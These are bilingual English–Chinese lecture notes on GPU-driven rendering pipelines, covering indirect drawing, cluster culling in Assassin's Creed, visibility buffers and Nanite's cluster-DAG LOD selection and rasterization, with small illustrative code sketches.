    Problem 2: Driver state switching overhead between amount of draw commands

    问题 2:在绘制命令数量之间切换驱动程序状态的开销

    Bottleneck of Traditional Rendering Pipeline

    传统渲染管道的瓶颈

    webp

    When rendering complicated scene with dense geometries and many materials

    渲染具有密集几何体和许多材质的复杂场景时

    • High CPU overload

      CPU 过载严重

    • Frustum/Occlusion Culling

  视锥体剔除/遮挡剔除(Frustum/Occlusion Culling)

    • Prepare drawcall

  准备绘制调用(drawcall)

    • GPU idle time

  GPU 空闲时间

    • CPU can not follow up GPU

  CPU 跟不上 GPU

    • High driver overhead

  驱动程序开销高

    • GPU state exchange overhead when solving large amount of drawcalls

      解决大量 drawcall 时的 GPU 状态交换开销

    Compute Shader - General Computation on GPU

    计算着色器-GPU 上的通用计算

    • High-speed general purpose computing and takes advantage of the large numbers of parallel processors on the GPU

      高速通用计算,并利用 GPU 上的大量并行处理器

    • Less overhead to graphics pipeline

      减少图形管道的开销

    • Just one stage in pipeline

      只是管道中的一个阶段

    webp

    Draw-Indirect Graphics API

间接绘制(Draw-Indirect)图形 API

    Advantage:

    优点:

    • Allow you to specify parameters to draw commands from a GPU buffer, or via GPU compute program

      允许您指定参数以从 GPU 缓冲区或通过 GPU 计算程序绘制命令

    • “Draw-Indirect” command can merge a lot of draw calls into one single draw call, even with different mesh topology

    “绘制间接”命令可以将许多绘制调用合并到一个绘制调用中,即使使用不同的网格拓扑

    Notice:

    注意:

    • The actual name of “Draw-Indirect” is different in each graphics platform, but they act as the same role. (e.g.
      vkCmdDrawIndexedIndirect(Vulkan), ExecuteIndirect(D3D12), …)

      “绘制间接”的实际名称在每个图形平台中都不同,但它们扮演着相同的角色。
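As a concrete example of what "draw from a GPU buffer" means, here is a minimal Python sketch of packing Vulkan's VkDrawIndexedIndirectCommand records (field order per the Vulkan spec; the packing helper itself is only illustrative):

import struct

# VkDrawIndexedIndirectCommand: five 32-bit fields per draw record.
# A compute pass can write N such records into a GPU buffer, and a single
# vkCmdDrawIndexedIndirect call then issues all N draws.
def pack_draw_indexed_indirect(index_count, instance_count,
                               first_index, vertex_offset, first_instance):
    # vertexOffset is the only signed field
    return struct.pack('<IIIiI', index_count, instance_count,
                       first_index, vertex_offset, first_instance)

# Two merged "draw calls" in one indirect buffer, stride 20 bytes:
args = pack_draw_indexed_indirect(384, 1, 0, 0, 0) \
     + pack_draw_indexed_indirect(384, 1, 384, 0, 1)
assert len(args) == 2 * 20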

    webp

    GPU Driven Render Pipeline – DrawPrimitive vs. DrawScene

    GPU 驱动的渲染管道——DrawPrimitive 与 DrawScene

    • GPU controls what objects are actually rendered

      GPU 控制实际渲染的对象

      • Lod selection, visibility culling on GPU

        Lod 选择,GPU 上的可见性剔除

    • No CPU/GPU roundtrip

      无 CPU/GPU 往返

      • CPU do not touch any GPU data

        CPU 不接触任何 GPU 数据

    • N viewports/frustums

      N 个视口/视锥

Frees up the CPU to be used on other things, i.e. AI

释放 CPU 以用于其他用途,例如 AI

    webp

    GPU Driven Pipeline in Assassins Creed

    《刺客信条》中的 GPU 驱动流水线

    Motivation

    动机

    • Massive amounts of geometry: architecture, seamless interiors, crowds

      大量的几何形状:建筑、无缝的内部、人群

    Use mesh cluster rendering to

    使用网格簇渲染

    • Allow much more aggressive batching and culling granularity

      允许更严格的批处理和剔除粒度

    • Render different meshes efficiently with a single indirect draw command

      使用单个间接绘制命令高效渲染不同的网格

    webp

    Mesh Cluster Rendering

    网格簇渲染

    • Require

      需要

      • Fixed cluster topology (E.g. 64 triangles in Assassin Creed or 128 triangles in Nanite)

        固定集群拓扑(例如,刺客信条中的 64 个三角形或 Nanite 中的 128 个三角形)

      • Split & rearrange all meshes to fit fixed topology (insert degenerate triangles)

        拆分并重新排列所有网格以适应固定拓扑(插入退化三角形)

      • Fetch vertices manually in VS

        在 VS 中手动获取顶点

    • Key Implementation

      关键实施

      • Cull clusters by their bounding on GPU (usually by compute shader)

        通过 GPU 上的边界(通常通过计算着色器)剔除集群

      • GPU outputs culled cluster list & drawcall args

    GPU 输出剔除后的集群列表和绘制调用参数

      • Draw arbitrary number of visible clusters in single drawcall

        在单个 drawcall 中绘制任意数量的可见簇
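A minimal CPU-side sketch of the culling step above (bounding-sphere versus frustum test emitting a compacted visible-cluster list; on the GPU this is a compute shader appending through an atomic counter):

def cull_clusters(clusters, frustum_planes):
    # clusters: dicts with 'center' = (x, y, z) and 'radius'
    # frustum_planes: six (nx, ny, nz, d) planes, normals pointing inward
    visible = []
    for i, c in enumerate(clusters):
        cx, cy, cz = c['center']
        if all(nx * cx + ny * cy + nz * cz + d >= -c['radius']
               for (nx, ny, nz, d) in frustum_planes):
            visible.append(i)   # GPU version: atomic append into the list
    return visible              # also used to fill the indirect draw args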

    webp

    GPU Driven Pipeline in Assassins Creed

    《刺客信条》中的 GPU 驱动流水线

    • Overview

      概述

      • Offload more work from CPU to GPU

        将更多工作从 CPU 转移到 GPU

      • But not perfectly “draw scene” command, can only draw objects with the same material together

        但不是完美的“绘制场景”命令,只能将具有相同材质的对象绘制在一起

    webp

    Works on CPU side

    webp

    在 CPU 端工作

    • Perform very coarse frustum culling and then batch all unculled objects together by material

      执行非常粗略的截头体剔除,然后按材质将所有未剔除的对象批处理在一起

      • CPU quad tree culling

        CPU 四叉树剔除

  • Drawcalls merged based on a hash built from non-instanced data (e.g. material, renderstate, …)

    基于非实例化数据(例如材质、渲染状态等)构建的哈希来合并绘制调用

    • Update per instance data(e.g. transform, LOD factor…),static instances are persistent

      更新每个实例的数据(例如转换、LOD 因子等),静态实例是持久的

    GPU Instance Culling

    GPU 实例剔除

    • Output cluster chunks after instance culling

      实例剔除后输出集群块

    • Use the cluster chunk expansion (64 cluster in a chunk) to balance GPU threads within a wavefront.

      使用集群块扩展(一个块中有 64 个集群)来平衡波阵面内的 GPU 线程。

    webp

    GPU Cluster Culling

    GPU 集群剔除

    • Cluster culling by cluster bounding box

      通过聚类边界框进行聚类剔除

      • output cluster list

        输出集群列表

    • Triangle backface culling

      三角形背面剔除

      • output triangle visibility result and write offsets in new index buffer

    webp

    Index Buffer Compaction

    索引缓冲区压缩

• Prepare an empty index buffer (8 MB) and pre-assign space for each mesh instance

  准备一个空的索引缓冲区(8 MB),并为每个网格实例预分配空间

    • Parallel copy the visible triangles index into the new index buffer

      将可见三角形索引并行复制到新索引缓冲区中

    • Index buffer compaction and multi-draw rendering can be interleaved because of fixed size of new index buffer (8Mb)

      由于新索引缓冲区的大小固定(8Mb),索引缓冲区压缩和多绘制渲染可以交错进行
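A serial sketch of that compaction (standing in for the parallel prefix-sum + scatter that computes each triangle's write offset on the GPU):

def compact_index_buffer(old_indices, triangle_visible):
    # old_indices: flat index list, 3 entries per triangle
    # triangle_visible: one bool per triangle from the culling pass
    new_indices = []
    for tri, vis in enumerate(triangle_visible):
        if vis:
            # parallel version: offset = exclusive prefix sum of visibility
            new_indices.extend(old_indices[3 * tri : 3 * tri + 3])
    return new_indices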

    webp

    Codec Triangle Visibility in Cube: Backface Culling

    立方体中的编解码器三角形可见性:背面消隐

    • Bake triangle visibility for pixel frustums of cluster centered cubemap

  为以簇为中心的立方体贴图的各像素视锥烘焙三角形可见性

    • Cubemap lookup based on camera

      基于相机的立方体贴图查找

    • Fetch 64 bits for visibility of all triangles in cluster

      获取 64 位以查看集群中所有三角形的可见性

    webp

    webp

    Occlusion Culling for Camera and Shadow

    相机和阴影的遮挡抑制

    Occlusion Depth Generation

    遮挡深度生成

    • Depth pre-pass with best occluders in full resolution

  以全分辨率用最佳遮挡体(occluder)做深度预通道

      • Choose best occluders by artist or heuristic (e.g. 300 occluders)

    由美术人员或启发式方法选择最佳遮挡体(例如 300 个遮挡体)

      • Holes can be from rejected occluder (bad occluder selection or alpha-tested geometry)

    空洞可能来自被排除的遮挡体(遮挡体选择不当或经过 alpha 测试的几何体)

• Downsample the best occluders' depth to 512x256

  将最佳遮挡体的深度降采样到 512x256

    • Then combined with reprojection of 1/16 low resolution version of last frame’s depth

      然后结合最后一帧深度的 1/16 低分辨率版本的重新投影

  • Last frame's depth can help to fill the holes.

        最后一帧的深度有助于填补孔洞。

      • False occlusion is possible from large moving objects in the last frame’s depth, but works in most cases.

        在最后一帧的深度中,大型移动对象可能会出现假遮挡,但在大多数情况下都是有效的。

    • Generate hierarchy-Z buffer for GPU culling

      生成用于 GPU 剔除的分层 Z-缓冲区

    webp

    Two-Phase Occlusion Culling

    两相闭塞消隐

    1st phase

    第一阶段

    Cull objects & clusters using last frame’s depth pyramid

    使用上一帧的深度金字塔剔除对象和簇

    Render visible objects

    渲染可见对象

    2nd phase

    第二阶段

    Refresh depth pyramid

    刷新深度金字塔

    Test culled objects & clusters

    测试剔除的物体和集群

    Render false negatives

    渲染假阴性
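The two phases written out as a sketch (the pass functions are passed in as placeholders for the corresponding GPU passes):

def two_phase_occlusion_culling(objects, last_frame_hiz,
                                visible_in_hiz, render, build_depth_pyramid):
    # Phase 1: test against LAST frame's depth pyramid, draw what passes
    drawn, maybe_occluded = [], []
    for obj in objects:
        (drawn if visible_in_hiz(obj, last_frame_hiz)
               else maybe_occluded).append(obj)
    render(drawn)

    # Phase 2: rebuild the pyramid from what was just drawn, re-test the
    # rejected set, and render the false negatives (disocclusions)
    current_hiz = build_depth_pyramid()
    render([o for o in maybe_occluded if visible_in_hiz(o, current_hiz)])
    return current_hiz   # becomes "last frame's" pyramid for the next frame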

    webp

    Crazy Stressing Cases

    疯狂压力案例

• “Torture” unit test scene: 250,000 separate moving objects

  “酷刑”单元测试场景:250,000 个独立移动的物体

    • 1GB of mesh data (10k+ meshes)

      1GB 网格数据(10k+ 网格)

• 8k² texture cache atlas

  8k² 纹理缓存图集

    • DirectX 11 code path

      DirectX 11 代码路径

    • 64 vertex clusters (strips)

      64 个顶点簇(条带)

    • No ExecuteIndirect / MultiDrawIndirect

  没有使用 ExecuteIndirect / MultiDrawIndirect

    • Only two DrawInstancedIndirect calls

  只有两个 DrawInstancedIndirect 调用

    webp

    webp

    Fast Occlusion for Shadow

    快速遮挡阴影

    For each cascade

    对于每个级联

    • Generate camera depth reprojection (64x64 pixel)

      生成相机深度重投影(64x64 像素)

    • Then combine with last frame’s shadow depth reprojection

      然后结合上一帧的阴影深度重投影

    • Generate hierarchy-Z buffer for GPU culling

      生成用于 GPU 剔除的分层 Z-缓冲区

    webp

    Camera Depth Reprojection for Shadow Culling

    用于阴影消隐的相机深度重投影

    Motivation

    动机

    • It is essential to cull objects in light view, which does not cast a visible shadow

      在光线视角下剔除物体至关重要,因为光线视角不会投射出可见的阴影

    Implementation

    实施

    • Get camera visible areas that may appear shadow

      获取可能出现阴影的相机可见区域

    • For each 16*16screen tile, construct a cube (each yellow frustum) according to min/max depth in this tile.

      对于每个 16*16 的屏幕图块,根据该图块中的最小/最大深度构造一个立方体(每个黄色平截头体)。

    • Render max depth of these cubes in the light view

      在灯光视图中渲染这些立方体的最大深度

    • All objects that far from depth can be culled because they certainly do not contribute to visible shadow

      所有远离深度的物体都可以被剔除,因为它们肯定不会产生可见的阴影

    webp

    Best Cases of Camera Depth Reprojection

    相机深度重投影的最佳案例

    webp

    Visibility Buffer

    可见性缓冲区

    Recap - Deferred Shading, G-Buffer

    回顾-延迟着色,G-缓冲区

    • Forward rendering shades all fragments in triangle- submission order

      正向渲染为三角形中的所有片段着色-提交顺序

    • Wastes rendering power on pixels that don’t contribute to the final image

      在对最终图像没有贡献的像素上浪费渲染能力

    • Deferred shading solves this problem in 2steps:

      延迟着色通过两个步骤解决了这个问题:

    • First, surface attributes are stored in screen buffers -> G-Buffer

      首先,曲面属性存储在屏幕缓冲区 -> G-Buffer 中

    • Second, shading is computed for visible fragments only

      其次,仅对可见片段计算着色

    Deferred Shading

    延迟渲染

    webp

    Fat G-Buffer of Deferred Shading

    延迟遮光的 Fat G-Buffer

    • However, deferred shading increases memory bandwidth consumption:

      但是,延迟着色会增加内存带宽消耗:

      • Screen buffers for: normal, depth, albedo, material ID,…

    屏幕缓冲区存储:法线、深度、反照率、材质 ID、…

      • G-Buffer size becomes challenging at high resolutions

        G-缓冲区大小在高分辨率下变得具有挑战性

    webp

    Challenges of Complex Scene

    复杂场景的挑战

    webp

    webp

    Visibility Buffer - Filling

    可见性缓冲区-填充

    • Visibility Buffer generation step

      可见性缓冲区生成步骤

    • For each pixel in screen:

      对于屏幕中的每个像素:

      • Pack (alpha masked bit, drawID, primitiveID) into one 32-bit UINT

      • 将(alpha 掩码位、drawID、primitiveID)打包成一个 32 位的 UINT

      • Write that into a screen-sized buffer

        将其写入屏幕大小的缓冲区

    • The tuple (alpha masked bit, drawID, primitiveID) will allow a shader to access the triangle data in the shading step

      元组(alpha 掩码位、drawID、primitiveID)将允许着色器在着色步骤中访问三角形数据
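For illustration, one possible packing of that tuple into 32 bits (the field widths below are an assumed split, not the paper's exact layout):

def pack_visibility(alpha_masked, draw_id, primitive_id):
    # 1 bit alpha-mask flag | 8 bits drawID | 23 bits primitiveID (assumed split)
    assert 0 <= draw_id < (1 << 8) and 0 <= primitive_id < (1 << 23)
    return ((alpha_masked & 1) << 31) | (draw_id << 23) | primitive_id

def unpack_visibility(packed):
    return (packed >> 31) & 1, (packed >> 23) & 0xFF, packed & 0x7FFFFF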

    webp

    Visibility Buffer - Shading

    可见性缓冲区-着色

    • For each pixel in screen-space we do:

      对于屏幕空间中的每个像素,我们做:

    • Get drawID/triangleID at pixel pos

      在像素位置获取 drawID/trangleID

    • Load data for the 3 vertices from the VB

      从 VB 加载 3 个顶点的数据

    • Compute triangle gradients

      计算三角形梯度

    • Interpolate vertex attributes at pixel pos using gradients

      使用渐变在像素位置插值顶点属性

      • Attribs use w from position to compute perspective correct interpolation

        属性使用 w 从位置计算透视校正插值

      • MVP matrix is applied to position

        MVP 矩阵应用于定位

    • We have all data ready: shade and calculate final color

      我们已经准备好所有数据:阴影和计算最终颜色

    Pipeline of Visibility Buffer

    可见性缓冲管道

    webp

    Visibility Buffer + Deferred Shading

    可见性缓冲区+延迟着色

    webp

    Correct Texture Mipmap with Gradient Without

    无渐变的正确纹理 Mipmap

    webp

    Results

    Total

    • 8 Million Triangles
    • 5 Million Vertices

    webp

    Visibility Buffer

GPU AMD RADEON R9 380 (ms)    1080p    1440p    2160p
No MSAA                        8.57    10.72    15.19
No MSAA – No Culling          14.52    15.86    20.45
2x MSAA                       11.44    16.38    25.87
4x MSAA                       15.27    20.82    37.86

    Deferred Shading

GPU AMD RADEON R9 380 (ms)    1080p    1440p    2160p
No MSAA                        9.75    12.30    20.19
No MSAA – No Culling          14.16    16.60    24.06
2x MSAA                       16.16    23.09    42.68
4x MSAA                       24.90    36.37    69.64

    Virtual Geometry - Nanite

    虚拟几何-Nanite

    Challenges of Realistic Rendering

    webp

    Nanite Overview

    Nanite 概述

    • Overview

      概述

    • Geometry Representation

      几何表示法

      • Cluster-based LoD

        基于集群的 LoD

      • BVH and runtime LoD

        BVH 和运行时间 LoD

    • Rendering

      渲染图

      • Software and Hardware Rasterization

        软件和硬件光栅化

      • Visibility Buffer

        可见性缓冲区

      • Deferred Materials

    延迟材质(Deferred Materials)

      • Tile-based Acceleration

        基于瓷砖的加速

    • Virtual Shadow Map

      虚拟阴影贴图

    • Streaming and Compression

      流媒体和压缩

    Virtual Texture

    虚拟纹理

    • Build a virtual indexed texture to represent all blended terrain materials for whole scene

      构建一个虚拟索引纹理,以表示整个场景的所有混合地形材质

    • Only load materials data of tiles based on view depend LOD

      仅加载基于视图的 LOD 的瓷砖材质数据

    • Pre-bake materials blending into tile and store them into physical textures

      预烘烤材质混合到瓷砖中,并将其储存成物理纹理

    webp

    The Dream

    理想

    • Virtualize geometry like we did textures

      像纹理一样虚拟化几何体

      • No more budgets

        没有更多预算

        • Poly count

          多边形计数

        • Draw calls

        • Memory

      内存

    • Directly use film quality source art

      直接使用电影质量的源艺术

      • No manual optimization required

        无需手动优化

    • No loss in quality

      质量无损失

    Reality

    现实

    • MUCH harder than virtual texturing

  比虚拟纹理难得多

      • Not just memory management

        不仅仅是内存管理

      • Geometry detail directly impacts rendering cost

        几何体细节直接影响渲染成本

      • Geometry is not trivially filterable (SDF, Voxels, Point Clouds)

        几何体不能轻易过滤(SDF、体素、点云)

    Voxels?

    体素?

    • Spatially uniform data distribution

      空间均匀的数据分布

    • Big memory consumption

      内存消耗大

    • Attribute leaking

      属性泄漏

    webp

    • Not interested in completely changing all CG workflow

      对完全改变所有 CG 工作流程不感兴趣

      • Support importing meshes authored anywhere

        支持导入在任何地方编写的网格

      • Still have UVs and tiling detail maps

        仍然有 UV 和平铺细节贴图

      • Only replacing meshes, not textures, not materials, not tools

        仅替换网格,不替换纹理,不替换材质,不替换工具

    • Never ending list of hard problems

      永无止境的难题清单

    Subdivision Surfaces?

    细分曲面?

    • Subdivision by definition is amplification only

      根据定义,细分只是放大

    • Great for up close but doesn’t get simpler than base mesh

  近处效果很好,但无法比基础网格(base mesh)更简化

    • Sometimes produces an excessive number of triangles

      有时会产生过多的三角形

    webp

    Maps-based Method?

    基于地图的方法?

    • Works well for organic surfaces that already are uniformly sampled

      适用于已经均匀取样的有机表面

    • Difficult to control hard surface features

      难以控制的硬表面特征

    • Sometimes object surface is not connected

      有时物体表面不连接

    webp

    Point Cloud?

    点云?

    • Massive amounts of overdraw

      大量透支

    • Requires hole filling

      需要补孔

    webp

    https://highperformancegraphics.org/slides22/Software_Rasterization_of_2_Billion_Points_in_Real_Time.pptx

    webp

    Foundation of Computer Graphics

    计算机图形学基础

    • The most elemental, atomic unit of surface area in 3D space

      三维空间中最基本的原子表面积单位

    • Every surface can be turned into triangles

      每个曲面都可以变成三角形

    webp

    Nanite Geometry Representation

    Nanite 几何表示法

    Screen Pixels and Triangles

    屏幕像素和三角形

    • Linear scaling in instances can be ok

      实例中的线性缩放是可以的

    • Linear scaling in triangles is not ok

      三角形中的线性缩放是不合适的

    Why should we draw more triangles than screen pixels?

    为什么我们应该绘制比屏幕像素更多的三角形?

    webp

    Represent Geometry by Clusters

    按簇表示几何体

    webp

    View Dependent LOD Transitions – Better than AC Solutions

    视图相关 LOD 转换——优于 AC 解决方案

    webp

Similar Visual Appearance with 1/30 Rendering Cost!

    相似的视觉效果,渲染成本为 1/30!

    webp

    Naïve Solution - Cluster LoD Hierarchy

    幼稚的解决方案-集群 LoD 层次结构

    • Decide LOD on a cluster basis

      基于集群确定 LOD

    • Build a hierarchy of LODs

      构建 LOD 层次结构

      • Simplest is tree of clusters

        最简单的是集群树

      • Parents are the simplified versions of their children

    父节点是其子节点的简化版本

    webp

    Naïve Solution - Decide Cluster LOD Run-time

    天真的解决方案-确定集群 LOD 运行时间

    • Find cut of the tree for desired LOD

      找到所需 LOD 的树木切割

    • View dependent based on perceptual difference

      基于感知差异的视图依赖

    webp

    Naïve Solution – Simple Streaming Idea

    天真的解决方案——简单的流媒体创意

    • Entire tree doesn’t need to be in memory at once

      整个树不需要一次出现在内存中

    • Can mark any cut of the tree as leaves and toss the rest

      可以将树上的任何切口标记为叶子,然后扔掉剩下的

    • Request data on demand during rendering

      渲染过程中按需请求数据

      • Like virtual texturing

        类似于虚拟纹理

    webp

    But, How to Handle LOD Cracks

    但是,如何处理 LOD 裂缝

    • If each cluster decides LOD independent from neighbors, cracks!

      如果每个集群独立于邻居决定 LOD,那么就会破裂!

    • Naive solution:

      天真的解决方案:

      • Lock shared boundary edges during simplification

        在简化过程中锁定共享边界边

      • Independent clusters will always match at boundaries

        独立集群将始终在边界处匹配

    webp

    Locked Boundaries? Bad Results

    锁定边界?糟糕的结果

    • Collects dense cruft

  会积累密集的冗余几何(cruft)

    • Especially between deep subtrees

      尤其是在深子树之间

    webp

    webp

    Nanite Solution - Cluster Group

Nanite 解决方案——集群组(Cluster Group)

    • Can detect these cases during build

      可以在构建过程中检测到这些情况

    • Group clusters

  对集群进行分组

    • Force them to make the same LOD decision

      迫使他们做出相同的 LOD 决定

    • Now free to unlock shared edges and collapse them

      现在可以自由解锁共享边并折叠它们

    webp

    Build Operations

    构建操作

    • Pick grouped these 4 adjacent clusters

      将这 4 个相邻的集群进行分组

    • Merge and Simplify the clusters to half the number of triangles

      将簇合并并简化为三角形数量的一半

    • Split simplified triangle list back into 2 new clusters

      将简化的三角形列表拆分回 2 个新集群

    • We now have reduced 4 4-triangle clusters to 2 4-triangle clusters

      我们现在已经将 4 个 4 三角聚类减少到 2 个 4 三角群集

    webp

    • Cluster original triangles

      对原始三角形进行聚类

    • While NumClusters > 1

      当 NumClusters > 1 时

      • Group clusters to clean their shared boundary

        将集群分组以清理其共享边界

      • Merge triangles from group into shared list

        将组中的三角形合并到共享列表中

      • Simplify to 50% the number of triangles

        将三角形的数量简化到 50%

      • Split simplified triangle list into clusters (128 tris)

        将简化的三角形列表拆分为簇(128 个 tris)
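The loop in the bullets above as a Python-style sketch (the mesh-processing steps are passed in as placeholders):

def build_cluster_dag(triangles, split_into_clusters, group_adjacent_clusters,
                      merge_triangle_lists, simplify,
                      cluster_size=128, group_size=4):
    clusters = split_into_clusters(triangles, cluster_size)     # LOD 0 leaves
    while len(clusters) > 1:
        next_level = []
        for group in group_adjacent_clusters(clusters, group_size):
            merged = merge_triangle_lists(group)                # shared list
            # the GROUP boundary stays locked; former cluster boundaries
            # are now interior and free to collapse
            simplified = simplify(merged, target_tris=len(merged) // 2)
            next_level += split_into_clusters(simplified, cluster_size)
        clusters = next_level                                   # next LOD level
    return clusters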

    Build Clusters

    构建集群

    webp

    Simplification on Cluster Group

    集群组的简化

    webp

    webp

    Alternate Group Boundaries between Levels

    级别之间的备用组边界

    • The key idea is to alternate group boundaries from level to level by grouping different clusters.

      关键思想是通过对不同集群进行分组,在不同级别之间交替设置组边界。

    • A boundary in one level becomes the interior in the next level

      一层中的边界成为下一层的内部

    • Locked one level, unlocked the next

      锁定一个级别,解锁下一个级别

    webp

    Cluster group boundaries for LoD0

    LoD0 的集群组边界

    Cluster group boundaries for LoD1

    LoD1 的集群组边界

    Cluster group boundaries for LoD2

    LoD2 的集群组边界

    DAG for Cluster Groups

    集群组的 DAG

    • Merge and split makes this a DAG instead of a tree

      合并和拆分使其成为 DAG 而不是树

      • This is a good thing in that you can’t draw a line from LOD0 all the way to the root without crossing an edge

        这是一件好事,因为你不能在不穿过边的情况下从 LOD0 一直画到根部

      • Meaning there can’t be locked edges that stay locked and collect cruft

        这意味着不可能有锁定的边缘保持锁定并收集碎屑

    webp

    Why DAG, not Tree (Trap!)

    为什么是 DAG,而不是树(陷阱!)

    Jungle of clusters, group and their links

    集群、群体及其联系的丛林

    webp

    Let’s Chop the Lovely Bunny

    webp

    Detail of Simplification - QEM

    简化细节-QEM

    webp

    webp

    Runtime LoD Selection

    运行时 LoD 选择

    View-Dependent LoD Selection on DAG?

    DAG 上的视图相关 LoD 选择?

    Group is faster than cluster, but DAG is still very complicated

    组比簇快,但 DAG 仍然非常复杂

    webp

    LOD Selection for Cluster Group

    聚类组的 LOD 选择

    • Two submeshes with same boundary, but different LOD

      具有相同边界但 LOD 不同的两个子板

    • Choose between them based on screen-space error

      根据屏幕空间错误在它们之间进行选择

      • Error calculated by simplifier projected to screen

        投影到屏幕上的简化器计算误差

      • Corrected for distance and angle distortion at worst-case point in sphere bounds

        针对球体边界中最坏情况点的距离和角度失真进行了校正

    • All clusters in group must make same LOD decision

      组中的所有集群都必须做出相同的 LOD 决策

      • How? Communicate? No!

        怎么办?沟通?不!

      • Same input => same output

        相同的输入 => 相同的输出
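One standard way to project the simplifier's object-space error to screen space, so that every cluster of a group computes the identical number (a sketch of the usual formula, not Nanite's exact distance/angle correction):

import math

def projected_error_pixels(object_error, distance, fov_y, screen_height):
    # An error of E units at distance d spans roughly
    # E / (2 * d * tan(fov_y / 2)) of the view height; scale to pixels.
    if distance <= 0.0:
        return float('inf')          # bounds touch or are behind the camera
    return object_error * screen_height / (2.0 * distance * math.tan(fov_y / 2.0))

Because the inputs are the group's shared bounds and shared error, all clusters in the group reach the same LOD decision without communicating.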

    webp

    LOD Selection in Parallel

    并行 LOD 选择

    • LOD selection corresponds to cutting the DAG

      LOD 选择对应于切割 DAG

      • How to compute in parallel?

        如何并行计算?

      • Don’t want to traverse the DAG at run-time

        不想在运行时遍历 DAG

    • What defines the cut?

      切割的定义是什么?

      • Difference between parent and child

    父节点与子节点之间的差异

    • Draw a cluster when:

      在以下情况下绘制集群:

      • Parent error is too high && Our error is small enough

        父错误太高 & 我们的错误足够小

      • Can be evaluated in parallel!

        可以并行评估!

    webp

    • Only if there is one unique cut

      只有当有一个独特的切割

      • Force error to be monotonic

        力误差为单调

    • Parent view error >= child view error

      父视图错误 >= 子视图错误

    • Careful implementation to make sure runtime correction is also monotonic

      仔细实施以确保运行时校正也是单调的

    webp

    Core Equation of Parallel LoD Selection for Cluster Groups

    集群并行 LoD 选择的核心方程

    • When can we LOD cull a cluster?

      我们什么时候可以 LOD 剔除集群?

      • Render: ParentError > threshold && ClusterError <= threshold

        渲染:父错误 > 阈值 && ClusterError <= 阈值

      • Cull: ParentError <= threshold || ClusterError > threshold

    • Parent is already precise enough. No need to check child

  父节点已经足够精确,无需再检查子节点

      • ParentError <= threshold

        父错误 <= 阈值

      • Tree based on ParentError, not ClusterError!

        基于 ParentError 的树,而不是 ClusterError!

    Isolated LoD Selection for Each Cluster Group

    每个集群组的独立 LoD 选择

    • Render: ParentError > threshold && ClusterError <= threshold
    • Cull: ParentError <= threshold || ClusterError > threshold
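Which reduces the whole DAG cut to one independent test per cluster; a sketch (one GPU thread per cluster, no traversal):

def select_clusters(clusters, threshold):
    # Monotonic errors (parent_error >= cluster_error) guarantee that
    # exactly one cut of the DAG satisfies this predicate.
    return [c for c in clusters
            if c['parent_error'] > threshold and c['cluster_error'] <= threshold]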

    webp

    BVH Acceleration for LoD Selection

    用于 LoD 选择的 BVH 加速

    Really Bad Explanation of Why and How about BVH

关于 BVH 的“为什么”和“怎么做”的(粗略)解释

    • BVH4

      • Max of children’s ParentError

    取各子节点 ParentError 的最大值

      • Internal node: 4 children nodes

        内部节点:4 个子节点

      • Leaf node: List of clusters in group

        叶子节点:组中的簇列表

    Build BVH for Acceleration of LoD Selection

    构建 BVH 以加速 LoD 选择

    • 7,000,000 triangles will create 110,000 clusters

      7000000 个三角形将创建 110000 个簇

    • Iterating all cluster/cluster groups is too slow

      迭代所有集群/集群组太慢

    • Let’s build BVH for each LoD cluster groups

      让我们为每个 LoD 集群组构建 BVH

    webp

    Balance BVH for 4 Nodes

    平衡 4 个节点的 BVH

    webp

    Detail of BVH Acceleration

    • total 110437 clusters,

      总共 110437 个簇,

    • check bvh node = 107, check cluster = 4240,

      检查 bvh 节点 = 107、检查簇 = 4240

    • select cluster = 2175

      选择群集 = 2175

    webp

    Hierarchical Culling - Naive Approach

    分层剔除-朴素方法

    • Dependent DispatchIndirects

  相互依赖的 DispatchIndirect

      • One per level

        每层一个

    • Global synchronization

      全局同步

      • Wait for idle between every level

        在每个级别之间等待空闲

    • Worst case # of levels

      最坏情况下的级别数量

      • Empty dispatches at the end

        末尾为空调度

    • Can be mitigated by higher fanout

      可以通过更高的扇出来缓解

      • Wasteful for small/distant objects

        对小/远距离物体浪费

    webp

    Persistent Threads

    持久线程

    • Ideally

      理想情况下

      • Start on child as soon as parent finished

    父节点一完成就立刻开始处理其子节点

      • Spawn child threads directly from compute

        直接从计算中生成子线程

    • Persistent threads model instead

      改为持久线程模型

      • Can’t spawn new threads. Reuse them instead!

        无法生成新线程。重复使用它们!

      • Manage our own job queue

        管理我们自己的作业队列

      • Single dispatch with enough worker threads to fill GPU

        单分派,具有足够的工作线程来填充 GPU

      • Use simple multi-producer multi-consumer (MPMC) job-queue to communicate between threads

        使用简单的多生产者多消费者(MPMC)作业队列在线程之间进行通信
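A sketch of the pattern with CPU threads standing in for GPU worker lanes (the real queue is a ring buffer in GPU memory driven by atomic head/tail counters):

import queue, threading

def persistent_workers(roots, process_node, num_workers=8):
    # process_node(node) -> list of child nodes; workers are reused
    # across levels instead of one dispatch (and one sync) per level
    if not roots:
        return
    jobs = queue.Queue()
    for n in roots:
        jobs.put(n)
    state = {'pending': len(roots)}
    lock, done = threading.Lock(), threading.Event()

    def worker():
        while not done.is_set():
            try:
                node = jobs.get(timeout=0.01)
            except queue.Empty:
                continue
            children = process_node(node)
            with lock:
                # account for children BEFORE enqueueing them, so the
                # counter can only hit zero when everything is done
                state['pending'] += len(children) - 1
                finished = (state['pending'] == 0)
            if finished:
                done.set()
            for c in children:
                jobs.put(c)

    threads = [threading.Thread(target=worker) for _ in range(num_workers)]
    for t in threads: t.start()
    for t in threads: t.join()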

    webp

    Nanite Rasterization

    Nanite 光栅化

    Pixel Scale Detail

    像素比例细节

    • Can we hit pixel scale detail with triangles > 1 pixel?

      我们可以用大于 1 像素的三角形来达到像素级的细节吗?

    • Depends how smooth

      取决于平滑程度

    • In general no

      一般来说,没有

    • Need to draw pixel sized triangles

      需要绘制像素大小的三角形

    webp

    Hardware Rasterization

    硬件光栅化

    • HW Rasterization unit is quad (2x2 pixels) for ddx and ddy

      对于 ddx 和 ddy,HW 光栅化单元为四边形(2x2 像素)

    • Need help pixels (yellow) to form quads

      需要帮助像素(黄色)来形成四边形

    webp

    • Use 4x4 tiled traversal to accelerate

      使用 4x4 平铺遍历来加速

    webp

    • A lot of wasting for small triangle

      小三角形浪费很多

    • tiled traversal stage is useless

      平铺遍历阶段毫无用处

• quads generate 4x the pixels they actually cover

      四边形产生的像素比实际覆盖的像素多 4 倍

    webp

    Software Rasterization for Tiny Triangles

    微小三角形的软件光栅化

    • Terrible for typical rasterizer

      对于典型的光栅化器来说很糟糕

    • Typical rasterizer:

      典型光栅化器:

      • Macro tile binning

        宏平铺

      • Micro tile 4x4

        微型瓷砖 4x4

